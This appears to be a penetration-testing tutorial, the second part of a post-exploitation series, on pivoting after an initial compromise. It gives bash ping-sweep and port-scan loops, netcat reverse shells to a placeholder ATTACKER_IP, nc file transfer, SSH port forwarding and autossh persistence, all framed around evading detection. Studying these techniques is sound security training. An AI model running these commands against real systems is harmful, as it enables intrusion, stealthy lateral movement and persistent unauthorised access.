2026 ~12 min read Pivoting Lateral Movement

Post-Exploitation Part 2: Pivoting

Root on one box means nothing if you can't move. Part 2 covers lateral movement — Living off the Land, SSH tunneling, SOCKS proxying, and maintaining access across segmented networks.

LOLBins SSH Tunneling SOCKS Proxy Part 2 of 2

Understanding Pivoting

In Part 1, we covered privilege escalation. Now we shift to pivoting — moving laterally within a network after initial compromise. Pivoting enables access to internal hosts and services not directly exposed, often leading to systems containing more sensitive data. Each compromised system pushes us deeper.

Living Off the Land

LOTL relies on tools already installed on the system. Since these binaries are legitimate and used daily, their activity often passes intrusion detection unnoticed.

Network Discovery with Bash

lotl recon Bash 
# Ping sweep — discover live hosts
for i in {1..255}; do
  (ping -c 1 192.168.1.${i} | grep "bytes from" &)
done

# Port scan — find services
for i in {1..65535}; do
  (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo "$i open"
done

LOLBins — Netcat

nc is frequently preinstalled and its traffic blends with normal activity. Commonly used for reverse shells, listeners, and file transfers.

netcat pivoting Bash 
# Reverse shell (with -e)
nc -e /bin/sh ATTACKER_IP PORT

# Reverse shell (named pipe fallback)
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT >/tmp/f

# File transfer
# Victim:  nc -l -p 1234 > received_file
# Attacker: nc TARGET_IP 1234 < payload_file

SSH Tunneling

SSH establishes encrypted connections between systems. By abusing SSH tunneling, we forward traffic through compromised hosts — staying encrypted and blending with normal SSH traffic while accessing internal services.

Local Port Forwarding

Exposes a remote service on a local port. Traffic from the local port is forwarded through the SSH tunnel to the destination.

local forwarding Bash 
# Forward remote port 80 to local 8080
ssh -L 8080:127.0.0.1:80 user@ssh_server

# 8080 = local listening port
# 127.0.0.1:80 = destination from SSH server's perspective
# localhost:8080 now reaches the remote service

Remote Port Forwarding

The inverse — expose a local service through a remote SSH server. The remote server listens on a specified port and tunnels connections back to your machine.

remote forwarding Bash 
# Expose local 8080 via remote port 9000
ssh -R 9000:localhost:8080 user@10.10.10.5

# Port 9000 opens on 10.10.10.5
# Connections to 10.10.10.5:9000 → localhost:8080

Remote port forwarding is particularly useful for pivoting because it exposes internal services to your attack machine, creates reliable callback channels, and the traffic is encrypted — blending with normal SSH usage.

Persistence with autossh

Standard SSH tunnels drop when the connection dies. autossh monitors and re-establishes tunnels automatically — providing reliable persistence even in restricted network environments.

Pivoting Summary

Each technique serves a different scenario: LOTL for stealth recon, SSH tunneling for encrypted access to internal services, SOCKS proxying for routing arbitrary traffic. Layer them for maximum reach.